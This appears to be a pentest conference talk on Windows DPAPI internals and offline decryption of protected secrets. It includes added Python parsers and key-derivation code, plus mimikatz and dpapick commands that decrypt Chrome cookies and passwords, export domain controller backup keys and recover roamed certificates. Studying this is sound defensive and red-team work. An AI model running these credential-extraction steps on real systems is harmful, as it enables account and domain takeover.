This document discusses Windows Data Protection API (DPAPI) and how pentesters can leverage it. DPAPI is used to encrypt credentials, certificates, and other sensitive data using a master key protected by the user's password or credentials. The document covers how DPAPI works internally, decrypting DPAPI blobs using tools like Mimikatz and Dpapick, decrypting credentials stored in browsers like Chrome, decrypting certificates, and decrypting credentials synced across devices via roaming. It provides technical details on DPAPI and practical techniques pentesters can use to decrypt credential data protected by DPAPI.
Windows DPAPI “Sekretiki”

or
DPAPI for pentesters

Konstantin Evdokimov
Head of Pentest team, «М 13» Ltd.
About me

• Red-teamer / pentester / researcher at M-13 Ltd
• About 6 years in infosecurity
• Offensive and defensive projects
• APT and red-team research
DPAPI – WTF ?

• DPAPI – Windows Data Protection API
• MS says: «The public DPAPI interfaces are part of Crypt32.dll and are available for any user process that has loaded it»
• Present since Windows 2000
• Simple interface: hand DPAPI your data and get back an opaque blob; hand the blob back and get your data
[Diagram: Data -> Crypt -> DPAPI blob; DPAPI blob -> Decrypt -> Data]
DPAPI – WTF ? MS says:
(screenshot of the MSDN description; not reproduced in this extract)

DPAPI – WTF ?
Ok, but I am a lamer…
(illustration only)

DPAPI – WTF ?
Ok, but I am a coder…
CryptProtectData() / CryptUnprotectData()
[Diagram: the user's Windows password is the secret that ultimately unlocks the blob]
DPAPI – WTF ?

Two scopes: CurrentUser and LocalMachine
• CurrentUser – only that user (on that machine) can decrypt
• LocalMachine (CRYPTPROTECT_LOCAL_MACHINE flag) – any process on that machine can decrypt, whoever the user is

DPAPI – WTF ?

Only one…
or..
Almost only one…
(the user is not the only party able to decrypt; see master keys, the domain backup key and DPAPI_SYSTEM below)
DPAPI – for pentesters… not for forensics

About DPAPI – many, many times
• BlackHat 2010 (Bursztein, Picod: "Reversing DPAPI and Stealing Windows Secrets Offline")
• Passcape, Synacktiv (many thanks !!!)
• Jean-Michel Picod (dpapick)
• Benjamin Delpy (mimikatz)

Pentester's view of DPAPI
• No Mimikatz on the target (AV, HIPS, FireEye, CrowdStrike)
• No online decryption – offline only
• DPAPIck is flexible, but its last commit was in 2014
DPAPI Inside

DPAPI inside – no crypto, please…
[Diagram: password + SID unlock the Masterkey; Masterkey + DPAPI blob -> Data, and Masterkey + Data -> DPAPI blob]
DPAPI inside – crypto, hm… I love it…
• https://msdn.microsoft.com/en-us/library/ms995355.aspx (Windows Data Protection)

DPAPI inside – crypto, hm… I love it…
[Diagram: password + SID -> Pre-key; Pre-key + salt, Iter N rounds of PBKDF2 -> AES key that unwraps the Masterkey; Masterkey -> DPAPI blob <-> Data]

DPAPI inside – master-key
• The master key itself is 64 random bytes
• It is stored encrypted (AES-CBC; 3DES on older OS) under a key that PBKDF2 derives, with Iter N rounds, from the Pre-key and the salt kept in the master key file
• An HMAC stored next to it lets a candidate Pre-key be verified (this is what hashcat/john brute-force against)

DPAPI inside – Pre-key
• Local account: SHA1(utf16le(password))
• Domain account: MD4(utf16le(password)), i.e. the NT hash, so a dumped hash is as good as the password
• Pre-key = HMAC-SHA1(key = that hash, msg = utf16le(SID + "\0"))
• PBKDF2(Pre-key, salt, Iter N) -> key material for decrypting the master key

DPAPI inside – encrypt data
[Diagram: Masterkey (64 bytes) + blob salt + optional entropy -> HMAC -> per-blob key; AES encrypt + HMAC -> DPAPI BLOB]

DPAPI inside – decrypt data
[Diagram: Pre-key -> decrypt Masterkey (64 bytes) -> AES decrypt the DPAPI BLOB -> decrypted data]
DPAPI inside – OS variations

OS       Encryption   Hash     PBKDF2 iterations
XP       3DES         SHA1     4000
Vista    3DES         SHA1     24000
7        AES          SHA512   5600
10       AES          SHA512   20000
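The Pre-key and master-key derivation described above, as an added example in Python (standard library only; this is not code from the talk or from DPAPIck). It derives the AES/3DES key and IV that unwrap a master key from a password, the SID and the salt/rounds/algorithm ids of the master key block, and shows where DPAPI's PBKDF2 deviates from RFC 2898. The final CBC decryption needs a crypto library and is left out. The SID, password and salt are constructed; the Windows 10 domain variant is written to match impacket's deriveKeysFromUser, which is an assumption about that tool rather than something the slides show.

```python
import hashlib
import hmac
import struct

# CALG_* identifiers as they appear in master key file headers.
HASH_ALGS = {0x8004: "sha1", 0x800C: "sha256", 0x800D: "sha384", 0x800E: "sha512"}
# cipher id -> (key length, IV length) in bytes
CIPHER_ALGS = {0x6603: (24, 8), 0x660E: (16, 16), 0x660F: (24, 16), 0x6610: (32, 16)}


def rfc2898_pbkdf2(password, salt, dklen, rounds, digest):
    """Standard PBKDF2, kept only to show where DPAPI's variant diverges."""
    return hashlib.pbkdf2_hmac(digest, password, salt, rounds, dklen)


def ms_pbkdf2(password, salt, dklen, rounds, digest):
    """PBKDF2 as DPAPI applies it to master keys (the variant dpapick and impacket implement).

    RFC 2898 feeds the previous U_i into the PRF; this feeds the running XOR
    accumulator back in, so results agree with the standard for rounds <= 2
    and diverge from round 3 on.
    """
    out = b""
    block = 1
    while len(out) < dklen:
        derived = hmac.new(password, salt + struct.pack(">L", block), digest).digest()
        for _ in range(rounds - 1):
            step = hmac.new(password, derived, digest).digest()
            derived = bytes(a ^ b for a, b in zip(derived, step))
        out += derived
        block += 1
    return out[:dklen]


def sid_bytes(sid):
    """The SID is HMAC'd as UTF-16LE including the terminating NUL."""
    return (sid + "\0").encode("utf-16le")


def prekey_local(password, sid):
    """Local account: SHA1(UTF-16LE(password)) keys an HMAC-SHA1 over the SID."""
    pwd_hash = hashlib.sha1(password.encode("utf-16le")).digest()
    return hmac.new(pwd_hash, sid_bytes(sid), "sha1").digest()


def nt_hash(password):
    """NT hash = MD4(UTF-16LE(password)); needs an OpenSSL build that still exposes MD4."""
    return hashlib.new("md4", password.encode("utf-16le")).digest()


def prekey_domain(nt_hash_bytes, sid):
    """Domain account before Windows 10 1607: same HMAC, keyed by the NT hash instead."""
    return hmac.new(nt_hash_bytes, sid_bytes(sid), "sha1").digest()


def prekey_domain_win10(nt_hash_bytes, sid):
    """Domain account on Windows 10 1607+ (mimikatz '/protected'): two PBKDF2-SHA256
    stages over the NT hash first. Assumption: mirrors impacket's deriveKeysFromUser."""
    tmp = hashlib.pbkdf2_hmac("sha256", nt_hash_bytes, sid.encode("utf-16le"), 10000)
    tmp = hashlib.pbkdf2_hmac("sha256", tmp, sid.encode("utf-16le"), 1)[:16]
    return hmac.new(tmp, sid_bytes(sid), "sha1").digest()[:20]


def masterkey_cipher_key(prekey, salt, rounds, hash_id, cipher_id):
    """Key and IV that CBC-decrypt the master key block; salt, rounds and the
    algorithm ids come from the block header in the master key file."""
    key_len, iv_len = CIPHER_ALGS[cipher_id]
    derived = ms_pbkdf2(prekey, salt, key_len + iv_len, rounds, HASH_ALGS[hash_id])
    return derived[:key_len], derived[key_len:key_len + iv_len]


if __name__ == "__main__":
    # Constructed sample: Windows 10 local account, AES-256 / SHA-512, 20000 rounds.
    salt = bytes(range(16))
    prekey = prekey_local("P@ssw0rd", "S-1-5-21-1-2-3-1001")
    key, iv = masterkey_cipher_key(prekey, salt, 20000, 0x800E, 0x6610)
    print("AES key:", key.hex())
    print("IV     :", iv.hex())
```

Feed the returned key and IV to an AES-CBC decryption of the block's ciphertext; the last 64 bytes of the plaintext are the master key, the first 16 bytes are an HMAC salt and the bytes after them the HMAC used to verify it. Using a standard PBKDF2 here silently produces a wrong key for any real round count.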


DPAPI inside – DPAPI hardening

HKLM\Software\Microsoft\Cryptography\Protect\Providers\df9d8cd0-1501-11d1-8c7a-00c04fc297eb\
• MasterKeyIterationCount (REG_DWORD)
• Encr Alg, Encr Alg Key Size (REG_DWORD)
• MAC Alg, MAC Alg Key Size (REG_DWORD)
DPAPI inside – A-A-A-A-A-A
[Diagram: what offline decryption of a BLOB needs – the Masterkey file, the user's SID, and the user's password or password hash]

DPAPI inside – password change and CREDHIST

P@ssw0rd -> P@ssw0rd1
[Diagram: Masterkey1..Masterkey4 each protect their own BLOBs; the CREDHIST file links the old password to the new one]
• CREDHIST is a chain of previous password hashes, each entry encrypted under the next password, so the current password still reaches master keys created under old ones

DPAPI inside – domain password reset
DPAPI Backup Key Protocol
[Diagram: every domain user's master key file also carries a DomainKey copy encrypted with the domain's RSA public backup key; the Domain Controller holds the private key; over RPC (MS-BKRP) the PC hands the DomainKey to the Domain Controller and gets the decrypted Masterkey back]
DPAPI inside – user Masterkey
c:\Users\%USER%\AppData\Roaming\Microsoft\Protect\%SID%\

DPAPI inside – system Masterkey
C:\Windows\System32\Microsoft\Protect\S-1-5-18\ (the User subfolder holds the SYSTEM account's user-scope keys)

DPAPI inside – MasterKey
• 010 Editor with a Masterkey template (screenshot; Win10, non-domain)

DPAPI inside – DomainKey
• The domain Masterkey backup block (screenshot; Win10, domain joined)

DPAPI inside – Masterkey block header
• PBKDF2 rounds
• idHash – SHA512
• idCipher – AES

DPAPI inside – 010 Editor, Masterkey key material (screenshot)
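A parser for the master key file shown in the 010 Editor screenshots above, plus the "Preferred" file that sits next to the GUID-named files and records which master key is currently in use. This is an added example, not code from the talk or from DPAPIck; the field layout is the 128-byte header and block layout that dpapick and mimikatz read, and the sample file is constructed here with dummy key bytes.

```python
import struct
import uuid
from datetime import datetime, timedelta

HASH_NAMES = {0x8004: "SHA1", 0x800C: "SHA256", 0x800D: "SHA384", 0x800E: "SHA512"}
CIPHER_NAMES = {0x6603: "3DES", 0x660E: "AES-128", 0x660F: "AES-192", 0x6610: "AES-256"}
# 128-byte file header: version, 2 reserved, UTF-16LE GUID, 2 reserved, policy, 4 section lengths
HEADER_FMT = "<LLL72sLLLQQQQ"
# master key block: version, salt, PBKDF2 rounds, hash id, cipher id, then ciphertext
MK_BLOCK_FMT = "<L16sLLL"


def parse_masterkey_file(data):
    """Return header fields and sections of a master key file (Protect/<SID>/<GUID>)."""
    (version, _, _, guid_raw, _, _, policy,
     mk_len, bk_len, ch_len, dk_len) = struct.unpack_from(HEADER_FMT, data, 0)
    info = {
        "version": version,
        "guid": guid_raw.decode("utf-16le").rstrip("\0"),
        "policy": policy,
        "has_credhist": ch_len > 0,
        "domain_joined": dk_len > 0,   # DomainKey block = copy wrapped with the DC backup key
    }
    off = struct.calcsize(HEADER_FMT)
    mk = data[off:off + mk_len]
    off += mk_len + bk_len             # skip the local backup key block
    _, salt, rounds, hash_id, cipher_id = struct.unpack_from(MK_BLOCK_FMT, mk, 0)
    info.update(salt=salt, rounds=rounds,
                hash=HASH_NAMES.get(hash_id, hex(hash_id)),
                cipher=CIPHER_NAMES.get(cipher_id, hex(cipher_id)),
                ciphertext=mk[struct.calcsize(MK_BLOCK_FMT):])
    if ch_len:
        _, ch_guid = struct.unpack_from("<L16s", data, off)
        info["credhist_guid"] = str(uuid.UUID(bytes_le=ch_guid))
        off += ch_len
    if dk_len:
        _, secret_len, check_len, bk_guid = struct.unpack_from("<LLL16s", data, off)
        body = data[off + 28:off + dk_len]
        info["backupkey_guid"] = str(uuid.UUID(bytes_le=bk_guid))
        info["domainkey_secret"] = body[:secret_len]                 # RSA-encrypted master key
        info["domainkey_accesscheck"] = body[secret_len:secret_len + check_len]
    return info


def parse_preferred(data):
    """'Preferred' = little-endian GUID of the master key in use + FILETIME expiry."""
    guid, filetime = struct.unpack("<16sQ", data[:24])
    expiry = datetime(1601, 1, 1) + timedelta(microseconds=filetime // 10)
    return str(uuid.UUID(bytes_le=guid)), expiry


def build_sample_file(guid="6ce1d0a2-7b1e-4b5f-9c3a-0123456789ab", rounds=20000, domain=True):
    """Constructed sample: SHA512/AES-256 master key block, a CREDHIST link and,
    optionally, a DomainKey block. All key material is dummy bytes."""
    mk = struct.pack(MK_BLOCK_FMT, 2, bytes(range(16)), rounds, 0x800E, 0x6610) + b"\xaa" * 144
    ch = struct.pack("<L16s", 1, uuid.UUID(int=1).bytes_le)
    dk = b""
    if domain:
        dk = (struct.pack("<LLL16s", 1, 256, 64, uuid.UUID(int=2).bytes_le)
              + b"\xbb" * 256 + b"\xcc" * 64)
    header = struct.pack(HEADER_FMT, 2, 0, 0, guid.encode("utf-16le"), 0, 0, 0,
                         len(mk), 0, len(ch), len(dk))
    return header + mk + ch + dk


def build_sample_preferred(guid="6ce1d0a2-7b1e-4b5f-9c3a-0123456789ab", filetime=116444736000000000):
    """Constructed 'Preferred' file; the default FILETIME is 1970-01-01 00:00:00."""
    return uuid.UUID(guid).bytes_le + struct.pack("<Q", filetime)


if __name__ == "__main__":
    info = parse_masterkey_file(build_sample_file())
    print(info["guid"], info["cipher"], info["hash"], info["rounds"],
          "domain" if info["domain_joined"] else "local")
    print(parse_preferred(build_sample_preferred()))
```

Run it over a real Protect\<SID>\ directory to see at a glance which files have a DomainKey block (decryptable with the DC backup key, no password needed) and which rounds/algorithms a brute-force has to use.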
DPAPI inside – DPAPI BLOB
• Masterkey GUID
• idHash
• Salt
• HMACs
• idAlgCrypt
(010 Editor screenshot with a DPAPI Blob template showing the same fields)

DPAPI inside – DPAPI Blob
First bytes: 01 00 00 00 D0 8C 9D DF 01 15…
• 01 00 00 00 – blob version 1
• D0 8C 9D DF 01 15 … – crypto provider GUID df9d8cd0-1501-11d1… stored little-endian
Hex: 01 00 00 00 D0 8C 9D DF 01 15…
Base64: AQAAANCMnd8BFdER…
• Grep for either prefix to find DPAPI blobs in files, registry values and databases
DPAPI, Pentester's guide

DPAPI usage…
• SYSTEM: certificates, EFS, WiFi, IE, Credential Vault
• Applications: Google (Chrome, GTalk), Skype, Dropbox
• Auth: RSA SecurID

Decrypting DPAPI… bruteforcing the password

hashcat -m 15300 …

DPAPImk2john.py …

…but not Win10 domain master keys (at the time of the talk; their extra PBKDF2 stages were not covered by these modes)
Decrypting DPAPI blobs…
• System tools
  • PowerShell – [Security.Cryptography.ProtectedData]::Unprotect(…)
• Mimikatz
  • online mimikatz
  • offline mimikatz
• Passcape Password Recovery
• DPAPIck – Python, flexible
• Impacket – from version 0.9.19 (dpapi module)

Decrypting DPAPI blobs… context

User context (an interactive logon, so LSASS holds the user's DPAPI key and decrypts for you)
• GUI, RDP with the password or pass-the-hash
• Schtasks
• Runas

Non-user context (network logon: no password and no hash reach LSASS, so user-scope blobs do not decrypt)
• Impacket (wmiexec, smbexec, dcomexec)
• PsExec, Restricted Admin
• Meterpreter ?
Using DPAPI… PowerShell
(screenshots: the string "Password" protected with ProtectedData in the user's own context, then unprotected back to "Password")
Decrypting DPAPI… Chrome…

Cookie file location: %localappdata%\Google\Chrome\User Data\Default\Cookies
Login data location: %localappdata%\Google\Chrome\User Data\Default\Login Data
• SQLite databases
• cookie values and passwords are DPAPI blobs – user master key
• Caveat: since Chrome 80 the values are AES-256-GCM (prefix "v10") under a key that is itself a DPAPI blob (base64, prefixed with the ASCII string DPAPI) in %localappdata%\Google\Chrome\User Data\Local State, os_crypt.encrypted_key; decrypting that one blob with the user master key unlocks the whole database. Chrome 127+ adds app-bound encryption (prefix "v20"), where the key is wrapped with the SYSTEM DPAPI key as well, so the system master keys are needed too.

Decrypting DPAPI… Chrome…
Mimikatz – user context
dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Cookies" /unprotect

Mimikatz – non-user context
dpapi::masterkey /in:<..> /sid:<..> /password:<..> /protected
sekurlsa::dpapi
dpapi::chrome /in:"…\Cookies" /masterkey:f35cfc2b44aed…
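A parser for the blob header laid out in the "DPAPI Blob" slides, applied to the Chrome Login Data table described above. This is an added example, not code from the talk or from DPAPIck: it builds an in-memory stand-in for Login Data (table layout, URLs, GUIDs and key bytes are constructed) and reports which master key GUID each stored password needs, so you know which files under Protect\<SID>\ to collect, and flags Chrome 80+ "v10" values that instead need the os_crypt key from Local State. No decryption happens here.

```python
import sqlite3
import struct
import uuid

PROVIDER_GUID = "df9d8cd0-1501-11d1-8c7a-00c04fc297eb"
# Every CryptProtectData blob starts with version 1 + the provider GUID (little-endian):
# 01 00 00 00 D0 8C 9D DF 01 15 D1 11 ...
DPAPI_MAGIC = b"\x01\x00\x00\x00" + uuid.UUID(PROVIDER_GUID).bytes_le
CHROME_V10 = b"v10"   # Chrome 80+: AES-256-GCM, key = DPAPI blob in "Local State"


def _take(data, off, fmt):
    vals = struct.unpack_from(fmt, data, off)
    return vals, off + struct.calcsize(fmt)


def _take_lv(data, off):
    """Length-prefixed field: uint32 length, then that many bytes."""
    (n,), off = _take(data, off, "<L")
    return data[off:off + n], off + n


def parse_dpapi_blob(blob):
    """Header fields of a CryptProtectData blob; ciphertext is returned untouched."""
    if not blob.startswith(DPAPI_MAGIC):
        raise ValueError("not a DPAPI blob (version/provider GUID mismatch)")
    off = len(DPAPI_MAGIC)
    (mk_version, mk_guid, flags), off = _take(blob, off, "<L16sL")
    description, off = _take_lv(blob, off)
    (cipher_id, cipher_keylen), off = _take(blob, off, "<LL")
    salt, off = _take_lv(blob, off)
    strong, off = _take_lv(blob, off)             # "strong" HMAC key, usually empty
    (hash_id, hash_len), off = _take(blob, off, "<LL")
    hmac_value, off = _take_lv(blob, off)
    ciphertext, off = _take_lv(blob, off)
    signature, off = _take_lv(blob, off)
    return {
        "masterkey_guid": str(uuid.UUID(bytes_le=mk_guid)),
        "flags": flags,
        "description": description.decode("utf-16le").rstrip("\0"),
        "cipher_id": cipher_id, "cipher_keylen": cipher_keylen,
        "salt": salt, "strong": strong, "hash_id": hash_id, "hash_len": hash_len,
        "hmac": hmac_value, "ciphertext": ciphertext, "signature": signature,
    }


def build_dpapi_blob(mk_guid, ciphertext, description="", cipher_id=0x6610, hash_id=0x800E):
    """Constructed blob with the real header layout and dummy salt/HMAC/signature."""
    def lv(b):
        return struct.pack("<L", len(b)) + b
    desc = (description + "\0").encode("utf-16le") if description else b""
    return (DPAPI_MAGIC + struct.pack("<L16sL", 1, uuid.UUID(mk_guid).bytes_le, 0)
            + lv(desc) + struct.pack("<LL", cipher_id, 256) + lv(bytes(32)) + lv(b"")
            + struct.pack("<LL", hash_id, 512) + lv(bytes(64)) + lv(ciphertext) + lv(bytes(64)))


def build_sample_login_data():
    """In-memory stand-in for Chrome's Login Data (constructed rows)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE logins (origin_url TEXT, username_value TEXT, password_value BLOB)")
    mk_a = "11111111-2222-3333-4444-555555555555"
    mk_b = "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee"
    rows = [
        ("https://intranet.example/", "alice", build_dpapi_blob(mk_a, b"\x10" * 32)),
        ("https://crm.example/", "alice", build_dpapi_blob(mk_a, b"\x20" * 48)),
        ("https://old.example/", "alice", build_dpapi_blob(mk_b, b"\x30" * 16)),
        ("https://new.example/", "alice", CHROME_V10 + b"\x00" * 28),
    ]
    db.executemany("INSERT INTO logins VALUES (?, ?, ?)", rows)
    return db


def inventory_logins(db):
    """Map each stored credential to the key that decrypts it: a master key GUID
    for DPAPI blobs, or the Local State os_crypt key for Chrome 80+ 'v10' values."""
    needed = {}
    for url, user, pw in db.execute("SELECT origin_url, username_value, password_value FROM logins"):
        if pw.startswith(DPAPI_MAGIC):
            key = parse_dpapi_blob(pw)["masterkey_guid"]
        elif pw.startswith(CHROME_V10):
            key = "os_crypt.encrypted_key (Local State)"
        else:
            key = "unknown"
        needed.setdefault(key, []).append((url, user))
    return needed


if __name__ == "__main__":
    for key, entries in inventory_logins(build_sample_login_data()).items():
        print(key, "->", [u for u, _ in entries])
```

Point `sqlite3.connect` at a copied Login Data file (Chrome keeps the original locked) and the same loop tells you which Protect\<SID>\<GUID> files to fetch before going offline.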


Decrypting DPAPI… Chrome…
DPAPICK – offline decryption
./chrome.py --cookie <cookiefile> --sid <SID> --password <..> --masterkey <masterkeydir>
./chrome.py --cookie <cookiefile> --sid <SID> --hash <..> --masterkey <masterkeydir>
./chrome.py --cookie <cookiefile> --sid <SID> --pkey <rsa-priv.pem> --masterkey <masterkeydir>
(--hash: the NT hash of a domain user; --pkey: the domain DPAPI backup private key)
Decrypting DPAPI… DC
Domain Controller – private keys
• The DPAPI backup RSA private key lives on every DC; with it the DomainKey block of any domain user's master key decrypts, no password needed

Decrypting DPAPI… DC
Domain Controller – get private keys
• Mimikatz – remote connect (lsadump::backupkeys /system:<dc> /export), see the Mimikatz wiki
• NTDS parsing: https://www.dsinternals.com/en/retrieving-dpapi-backup-keys-from-active-directory/
Decrypting DPAPI… client certificates
Client certificates:
• Authentication (VPN, web apps, CRM, etc.)
• EFS (NTFS file encryption)
• OTR messengers
Public and private key
%APPDATA%\Microsoft\SystemCertificates\My\Certificates\ – the certificates (public part)
%APPDATA%\Microsoft\Crypto\RSA\<SID>\ – CryptoAPI private keys (CNG keys live in %APPDATA%\Microsoft\Crypto\Keys\ instead)
Private key – DPAPI encrypted with the user master key

Decrypting DPAPI… certificate, DPAPIck
DPAPICK offline decryption
./efs.py --certificates <cert dir> --rsakeys <RSA dir> --password <..> --masterkey <masterkeydir>
./efs.py --certificates <cert dir> --rsakeys <RSA dir> --pkey <rsa-priv.pem> --masterkey <masterkeydir>
Decrypting DPAPI… credential roaming
Roam user credentials and certs from PC to PC
• User logs in on PC1, imports a PFX
• User logs out and logs in on PC2
• The user's cert is available on PC2

Decrypting DPAPI… credential roaming
GPO and AD attributes (screenshots)

Decrypting DPAPI… credential roaming
AD attributes (the roamed master keys and credentials are stored on the user object itself, so a domain account that can read them is enough)
ldapsearch -x -h dc1.lab.local -D "[email protected]" -s sub "samAccountname=anyuser"
ldapsearch -x -h dc1.lab.local -D "[email protected]" -s sub "samAccountname=user1"
Decrypting DPAPI… credential roaming

Both attributes are DN-with-binary values ("B:<count>:<hex>:<DN>"); the snippets take the hex part and slice out the record name and the DPAPI-protected data:

import binascii

msPKIDPAPIMasterKeys (the slide abbreviates it as msDPAPImasterkeys) – one value per master key
mkname = binascii.unhexlify(ldapmk.split(':')[2][6:80]).strip(b"\x00").decode()
mkdata = binascii.unhexlify(ldapmk.split(':')[2][264:])

msPKIAccountCredentials – one value per certificate / private key
pkiname = binascii.unhexlify(ldapmk.split(':')[2][6:150]).strip(b"\x00").decode()
pkidata = binascii.unhexlify(ldapmk.split(':')[2][264:])
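The same extraction written out as an added example (not code from the talk or from DPAPIck), with the DN-with-binary container validated before slicing. The byte offsets are the ones the snippets above imply (hex 6..80 and 6..150 for the name, hex 264 onward for the data); the attribute value is constructed, and its exact internal layout is taken from the talk rather than from the schema documentation.

```python
import binascii

# Byte offsets implied by the talk's hex slices: the name starts at hex 6 (byte 3)
# and ends at hex 80 / 150 (byte 40 / 75); the payload starts at hex 264 (byte 132).
NAME_END = {"msPKIDPAPIMasterKeys": 40, "msPKIAccountCredentials": 75}
DATA_START = 132


def parse_dn_with_binary(value):
    """Split an AD DNWithBinary value 'B:<hex char count>:<hex>:<DN>' into (bytes, DN),
    refusing values whose count does not match the hex string."""
    parts = value.split(":", 3)
    if len(parts) != 4 or parts[0] != "B":
        raise ValueError("not a DNWithBinary value")
    _, count, hexdata, dn = parts
    if int(count) != len(hexdata):
        raise ValueError("length field %s does not match %d hex chars" % (count, len(hexdata)))
    return binascii.unhexlify(hexdata), dn


def split_roaming_record(attribute, raw):
    """(record name, payload) using the same offsets as the talk's snippets:
    master key GUID or certificate name, then the DPAPI-protected data."""
    name = raw[3:NAME_END[attribute]].rstrip(b"\x00").decode()
    return name, raw[DATA_START:]


def build_sample_value(name, payload, dn="CN=user1,CN=Users,DC=lab,DC=local"):
    """Constructed value: 3 header bytes, NUL-padded name, payload at byte 132."""
    raw = b"\x00\x00\x00" + name.encode().ljust(DATA_START - 3, b"\x00") + payload
    hexdata = binascii.hexlify(raw).decode()
    return "B:%d:%s:%s" % (len(hexdata), hexdata, dn)


if __name__ == "__main__":
    value = build_sample_value("6ce1d0a2-7b1e-4b5f-9c3a-0123456789ab", b"\x01\x02\x03")
    raw, dn = parse_dn_with_binary(value)
    print(dn, split_roaming_record("msPKIDPAPIMasterKeys", raw))
```

The payload of a msPKIDPAPIMasterKeys record is the master key file content; write it to a directory named after the GUID and the same chrome.py/efs.py invocations work against it.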
Decrypting DPAPI… credential roaming + dpapick
./efs.py --ldap-server <..> --ldap-connect admin:P@[email protected] --ldap-user user1 --password Password1
./efs.py --ldap-server <..> --ldap-connect admin:P@[email protected] --ldap-user user1 --pkey <rsa-priv.pem>
Decrypting DPAPI… Dropbox

%LOCALAPPDATA%\Dropbox\instance1\config.dbx – encrypted SQLite
%LOCALAPPDATA%\Dropbox\instance_db\instance.dbx
• DPAPI-encoded encryption key
HKCU\SOFTWARE\Dropbox\ks
HKCU\SOFTWARE\Dropbox\ks1
• Special permissions on the keys (fiddly; "dances with a tambourine")
• They contain DPAPI blobs

PowerShell – split the ks1 "Client" value into the DPAPI blob and its HMAC trailer:
$key_path = 'HKCU:\SOFTWARE\Dropbox\ks1';   # or ...\Dropbox\ks
$key_bin = (Get-ItemProperty -Path $key_path -Name Client).Client;
$key_version = [BitConverter]::ToUInt32($key_bin, 0);
if ($key_version -ne 0) { Write-Warning "Got version $key_version, expected 0." };
$blob_len = [BitConverter]::ToUInt32($key_bin, 4);
$key_hmac = $key_bin[(8+$blob_len)..($key_bin.length-2)];   # HMAC trailer after the blob
$blob_enc = $key_bin[0..(8+$blob_len-1)];                    # 8-byte header + DPAPI blob
$pr = [System.BitConverter]::ToString($blob_enc);
$pr
Decrypting DPAPI… Dropbox + dpapick
./filegeneric --sid <SID> --password <..> --masterkeydir ./dbx/masterkeys/ --inputfile ./dbx/ks1.blob
./filegeneric --sid <SID> --pkey <rsa-priv.pem> --masterkeydir ./dbx/masterkeys/ --inputfile ./dbx/ks1.blob

PowerShell – re-wrap a decrypted key with Dropbox's own entropy and rebuild the registry value (run as the target user):
$hdata = "4efebbdf394d4003317fc5c357beac4b";   # decrypted blob, hex
[Byte[]] $dv0_entropy = 0xd1,0x14,0xa5,0x52,0x12,0x65,0x5f,0x74,0xbd,0x77,0x2e,0x37,0xe6,0x4a,0xee,0x9b;
$data = ($hdata -split "(?<=\G\w{2})(?=\w{2})" | %{ [Convert]::ToByte($_, 16) });
Add-Type -AssemblyName System.Security;
$dk1 = [System.Security.Cryptography.ProtectedData]::Protect($data, $dv0_entropy, 'CurrentUser');
$pr = [System.BitConverter]::ToString($dk1); $pr
$OBJ_hmac = New-Object System.Security.Cryptography.HMACMD5   # no key given: .NET picks a random one; the key Dropbox uses is not shown in the talk
$hmac = $OBJ_hmac.ComputeHash($dk1)
$pr = [System.BitConverter]::ToString($hmac); $pr
# ks value = version 0 | blob length (0xF6 in this run) | DPAPI blob | HMAC
$pr = '00000000F6000000' + ([System.BitConverter]::ToString($dk1) -replace '-','') + ([System.BitConverter]::ToString($hmac) -replace '-','')
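The same ks "Client" container handled in Python, as an added example that is not code from the talk: uint32 version (0), uint32 blob length, the DPAPI blob, then the HMAC-MD5 trailer. It splits a value, checks that the payload really is a DPAPI blob, and reassembles it the way the PowerShell above does. The blob and MAC bytes are dummies; the decryption with the entropy from the talk still needs CryptUnprotectData as the user, or dpapick offline, and the HMAC key is not reproduced.

```python
import struct
import uuid

DPAPI_MAGIC = b"\x01\x00\x00\x00" + uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb").bytes_le
# Entropy the talk's PowerShell passes to ProtectedData.Protect for the Dropbox key
DROPBOX_ENTROPY = bytes([0xd1, 0x14, 0xa5, 0x52, 0x12, 0x65, 0x5f, 0x74,
                         0xbd, 0x77, 0x2e, 0x37, 0xe6, 0x4a, 0xee, 0x9b])
MD5_LEN = 16


def split_ks_client(value):
    """Split a ks/ks1 'Client' value into (DPAPI blob, trailer) with sanity checks."""
    version, blob_len = struct.unpack_from("<LL", value, 0)
    if version != 0:
        raise ValueError("unexpected ks version %d, expected 0" % version)
    blob = value[8:8 + blob_len]
    trailer = value[8 + blob_len:]
    if len(blob) != blob_len or not blob.startswith(DPAPI_MAGIC):
        raise ValueError("payload is not a complete DPAPI blob")
    if len(trailer) < MD5_LEN:
        raise ValueError("HMAC-MD5 trailer missing")
    return blob, trailer


def build_ks_client(blob, mac):
    """Inverse of split_ks_client: header + blob + MAC, ready to write back."""
    return struct.pack("<LL", 0, len(blob)) + blob + mac


def sample_ks_client():
    """Constructed value: a 0xF6-byte dummy blob (the length the talk's header 00000000F6000000 shows)."""
    blob = DPAPI_MAGIC + b"\x00" * (0xF6 - len(DPAPI_MAGIC))
    return build_ks_client(blob, b"\x11" * MD5_LEN)


if __name__ == "__main__":
    blob, mac = split_ks_client(sample_ks_client())
    print(len(blob), blob[:8].hex(), mac.hex())
```

After dpapick has decrypted the blob, `build_ks_client` with a freshly protected blob is what the PowerShell's last line writes back as hex.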
Decrypting DPAPI… RSA SecurID
• RSA SecurID Windows client
• RSA multifactor authentication
• OTP (one-time passwords)
%LOCALAPPDATA%\RSA\SecurIDStorage
• SQLite DB
• CryptoCheckSum = DPAPI encryption
• DBKey = DPAPI encryption inside DPAPI encryption

EnTokenSid = RSAEncr(DBEncKey, UserSID)
CryptoCheckSum = DPAPI blob (CurrentUser)
DBKeyEnc = DPAPI(CurrentUser, DPAPI(LocalSystem, DBKey))

Decrypting DPAPI… RSA SecurID
System master keys (inner layer)
• No password – the DPAPI_SYSTEM LSA secret unlocks them
• Mimikatz – online
• Mimikatz – offline (SYSTEM, SECURITY hives)
• Impacket – dpapi module (SYSTEM, SECURITY hives)
Current-user master keys (outer layer)
• user password / hash, as before
Mimikatz offline example: (screenshot)

Decrypting DPAPI… RSA SecurID
impacket offline example: (screenshot)

Decrypting DPAPI… RSA SecurID
DPAPIck SYSTEM masterkey: (screenshot)
DPAPI for pentesters – conclusions
• NO mimikatz online ! – OFFLINE decryption

• User master keys
  • %APPDATA%\Microsoft\Protect\<SID>\*

• System master keys
  • %SystemRoot%\System32\Microsoft\Protect\*

• DPAPI_SYSTEM (the LSA secret that unlocks the system master keys)
  • LSA secrets – online
  • SYSTEM, SECURITY hives – offline (reg save …, system\backup, etc.)

DPAPI for pentesters – conclusions
• User certificates
